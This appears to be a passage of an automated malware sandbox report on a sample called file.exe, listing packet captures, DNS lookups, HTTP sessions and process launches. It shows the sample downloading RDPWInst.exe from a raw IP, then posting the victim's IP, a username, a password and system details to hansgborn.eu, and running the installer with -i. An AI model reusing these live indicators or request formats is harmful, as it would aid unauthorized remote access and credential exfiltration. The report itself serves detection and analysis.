                                                                                                            Oct 2, 2024 08:55:00.189896107 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.189910889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.189918995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.189918995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.189927101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.189945936 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.189964056 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.189987898 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.189987898 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.190707922 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190726042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190741062 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190757990 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190773010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190787077 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.190787077 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.190789938 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190805912 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190823078 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190838099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190850019 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.190850019 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.190855026 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190871954 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190887928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190903902 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.190905094 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.190905094 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.191098928 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.191627979 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191643953 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191659927 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191675901 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191692114 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191708088 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191721916 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.191721916 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.191723108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191740990 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191759109 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191776037 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.191776037 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191793919 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191796064 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.191813946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191829920 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.191848040 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.191848040 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.192562103 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.192581892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.192625999 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.192641973 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.192656994 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.192660093 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.192660093 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.192673922 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.192689896 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.192704916 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.192720890 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.192723036 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.395667076 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.395724058 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396102905 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396125078 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396135092 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396140099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396147013 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396152973 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396162987 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396173000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396178007 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396178961 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396189928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396205902 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396213055 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396228075 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396229029 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396229029 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396245956 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396248102 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396313906 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396750927 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396765947 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396781921 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396796942 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396799088 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396811962 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396828890 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396832943 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396843910 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396850109 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396861076 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396877050 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396889925 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396907091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.396918058 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396918058 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.396951914 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397365093 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397396088 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397409916 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397424936 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397439957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397454977 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397468090 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397468090 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397476912 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397481918 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397488117 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397502899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397514105 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397514105 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397526026 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397541046 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397557020 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397562981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397577047 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397577047 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397583961 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397599936 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397603035 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397609949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397625923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.397628069 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.397711039 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398359060 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398375988 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398389101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398403883 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398417950 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398433924 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398446083 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398446083 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398449898 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398467064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398480892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398495913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398509979 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398510933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398509979 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398526907 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398545027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398551941 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398556948 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398572922 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398578882 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398578882 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398588896 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398605108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398618937 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398618937 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.398621082 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.398669004 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399322033 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399327993 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399333954 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399339914 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399355888 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399369001 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399372101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399399996 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399399996 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399405956 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399431944 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399447918 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399463892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399477959 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399481058 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399493933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399508953 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399512053 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399512053 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399525881 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399547100 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.399585009 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.399612904 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400194883 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400209904 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400227070 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400242090 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400257111 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400271893 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400285006 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400285006 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400286913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400301933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400319099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400321960 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400335073 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400350094 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400366068 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400366068 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400377989 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400393009 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400408983 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400424957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400439978 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400443077 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400444031 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400458097 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400475025 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.400494099 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.400521994 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.401818991 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401838064 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401851892 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401868105 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401880980 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401896000 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401910067 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.401910067 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.401911020 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401932955 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401948929 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401961088 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:55:00.401963949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401979923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.401994944 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:55:00.402009010 CEST8049702147.45.44.104192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 08:55:37.950931072 CEST | 52632 | 53 | 192.168.2.7 | 1.1.1.1
Oct 2, 2024 08:55:37.965933084 CEST | 53 | 52632 | 1.1.1.1 | 192.168.2.7
Oct 2, 2024 08:55:38.753180027 CEST | 59125 | 53 | 192.168.2.7 | 1.1.1.1
Oct 2, 2024 08:55:38.797389984 CEST | 53 | 59125 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 2, 2024 08:55:37.950931072 CEST | 192.168.2.7 | 1.1.1.1 | 0x1d0a | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Oct 2, 2024 08:55:38.753180027 CEST | 192.168.2.7 | 1.1.1.1 | 0xc3d | Standard query (0) | hansgborn.eu | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 2, 2024 08:55:37.965933084 CEST | 1.1.1.1 | 192.168.2.7 | 0x1d0a | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 08:55:37.965933084 CEST | 1.1.1.1 | 192.168.2.7 | 0x1d0a | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 08:55:37.965933084 CEST | 1.1.1.1 | 192.168.2.7 | 0x1d0a | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 08:55:38.797389984 CEST | 1.1.1.1 | 192.168.2.7 | 0xc3d | No error (0) | hansgborn.eu | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 2, 2024 08:55:38.797389984 CEST | 1.1.1.1 | 192.168.2.7 | 0xc3d | No error (0) | hansgborn.eu | | 188.114.96.3 | A (IP address) | IN (0x0001) | false

• hansgborn.eu
• 147.45.44.104
• api.ipify.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 147.45.44.104 | 80 | 7404 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 08:54:58.417622089 CEST | 94 | OUT | GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1
Host: 147.45.44.104
Connection: Keep-Alive
Oct 2, 2024 08:54:59.037098885 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Oct 2024 06:54:58 GMT
Content-Type: application/octet-stream
Content-Length: 1785344
Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f55533-1b3e00"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49709 | 104.26.13.205 | 80 | 7404 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 08:55:37.987941027 CEST | 63 | OUT | GET / HTTP/1.1
Host: api.ipify.org
Connection: Keep-Alive
Oct 2, 2024 08:55:38.493813992 CEST | 227 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Wed, 02 Oct 2024 06:55:38 GMT
                                                                                                            Content-Type: text/plain
                                                                                                            Content-Length: 11
                                                                                                            Connection: keep-alive
                                                                                                            Vary: Origin
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8cc2c9b938024368-EWR
                                                                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                            Data Ascii: 8.46.123.33
Oct 2, 2024 08:55:38.509138107 CEST | 39 | OUT | GET / HTTP/1.1
Host: api.ipify.org
Oct 2, 2024 08:55:38.634804964 CEST | 227 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Wed, 02 Oct 2024 06:55:38 GMT
                                                                                                            Content-Type: text/plain
                                                                                                            Content-Length: 11
                                                                                                            Connection: keep-alive
                                                                                                            Vary: Origin
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8cc2c9ba088c4368-EWR
                                                                                                            Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                            Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49711 | 188.114.97.3 | 443 | 7404 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-02 06:55:39 UTC | 171 | OUT | POST /core/receive.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Host: hansgborn.eu
                                                                                                            Content-Length: 185
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
2024-10-02 06:55:39 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-10-02 06:55:39 UTC | 185 | OUT | Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 50 61 6e 73 79 42 69 6e 73 26 70 61 73 73 77 6f 72 64 3d 57 65 6c 54 57 34 48 6e 61 4b 74 33 26 6f 73 5f 6e 61 6d 65 3d 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 26 70 72 6f 63 65 73 73 6f 72 3d 49 6e 74 65 6c 28 52 29 2b 43 6f 72 65 28 54 4d 29 32 2b 43 50 55 2b 36 36 30 30 2b 25 34 30 2b 32 2e 34 30 2b 47 48 7a 26 63 6f 72 65 73 3d 34 26 67 70 75 3d 4d 39 42 34 5f 46 52 26 67 70 75 5f 6d 65 6d 6f 72 79 3d 31 30 32 34 26 72 61 6d 3d 34 30 39 35 26 64 69 73 6b 5f 73 70 61 63 65 3d 33 38 33
Data Ascii: ip=8.46.123.33&user=PansyBins&password=WelTW4HnaKt3&os_name=Windows+10+Pro&processor=Intel(R)+Core(TM)2+CPU+6600+%40+2.40+GHz&cores=4&gpu=M9B4_FR&gpu_memory=1024&ram=4095&disk_space=383
2024-10-02 06:55:40 UTC | 601 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Wed, 02 Oct 2024 06:55:39 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F2D2S04sSbam0vp1jV%2F3XGo28XuQKiFnyovubs%2FxrHKBmDwj3D3Tp44eceldwaI95AohMLsfllXj8OmEmEieTAscO1ZO4UhS4zX2Nsm1dHbMrrmTkXjvP6NVWWGBN%2BY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8cc2c9bfbab87cb2-EWR
                                                                                                            0



                                                                                                            Target ID:1
                                                                                                            Start time:02:54:56
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                            Imagebase:0x6d0000
                                                                                                            File size:946'176 bytes
                                                                                                            MD5 hash:6CEB22AEB317C27CF8A0944EC9634D40
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000000.1376199757.00000000006D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:2
                                                                                                            Start time:02:54:59
                                                                                                            Start date:02/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                                                                                            Imagebase:0x410000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:02:54:59
                                                                                                            Start date:02/10/2024
